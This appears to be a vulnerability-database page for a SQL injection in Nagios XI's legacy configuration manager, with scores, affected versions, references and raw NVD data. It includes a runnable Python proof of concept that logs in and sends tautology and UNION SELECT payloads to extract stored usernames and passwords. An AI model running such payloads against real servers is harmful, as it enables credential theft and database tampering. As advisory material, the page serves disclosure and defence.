CVE-2012-10063

Description

Nagios XI versions prior to 2012R1.3 contain a SQL injection vulnerability in the legacy Core Configuration Manager (CCM) interface. Authenticated users could manipulate SQL queries by supplying crafted input to specific CCM parameters, potentially allowing access to configuration data stored in the application database. Successful exploitation could disclose or modify notification data and, in some cases, impact the application database more broadly.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.2:*:*:*:*:*:* - VULNERABLE

Nagios XI < 2012R1.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2012-10063 Nagios XI SQL Injection PoC # Target: Nagios XI < 2012R1.3 # Authentication required def exploit_sqli(target_url, username, password): """ Exploit SQL injection in Nagios XI CCM interface """ session = requests.Session() # Step 1: Login to Nagios XI login_url = f"{target_url}/nagiosxi/login.php" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) # Step 2: Access CCM with malicious payload ccm_url = f"{target_url}/nagiosxi/config/notification?cmd=modify" sqli_payload = "' OR '1'='1" exploit_data = { 'contact_name': sqli_payload, 'email': '[email protected]' } response = session.post(ccm_url, data=exploit_data, timeout=10) # Step 3: Extract data via UNION-based injection union_payload = "' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM nagiosxi.users--" exploit_data['contact_name'] = union_payload response = session.post(ccm_url, data=exploit_data, timeout=10) print(f"[*] Exploit sent to {ccm_url}") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2012-10063.py <target_url> <username> <password>") print("Example: python cve-2012-10063.py http://nagios-server admin nagios") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_sqli(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2012-10063
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2012-10063
[3] CVE Details https://www.cvedetails.com/cve/CVE-2012-10063/
[4] VulDB https://vuldb.com/cve/CVE-2012-10063
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.vulncheck.com/advisories/nagios-xi-authenticated-sqli-in-legacy-ccm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2012-10063", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:35.913", "lastModified": "2025-11-06T15:09:58.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2012R1.3 contain a SQL injection vulnerability in the legacy Core Configuration Manager (CCM) interface. Authenticated users could manipulate SQL queries by supplying crafted input to specific CCM parameters, potentially allowing access to configuration data stored in the application database. Successful exploitation could disclose or modify notification data and, in some cases, impact the application database more broadly."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndIncluding": "2011", "matchCriteriaId": "80293C30-1993-40B8-9495-6D0D9AA3E921"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.0:*:*:*:*:*:*", "matchCriteriaId": "63DC3A03-8CB1-489F-86D2-13F271C2C48D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.1:*:*:*:*:*:*", "matchCriteriaId": "653ED130-C4EC-4EC1-AE81-99BA7F888B33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.2:*:*:*:*:*:*", "matchCriteriaId": "B28B0CDB-0E18-4702-B498-C89431095C0D"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-authenticated-sqli-in-legacy-ccm", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}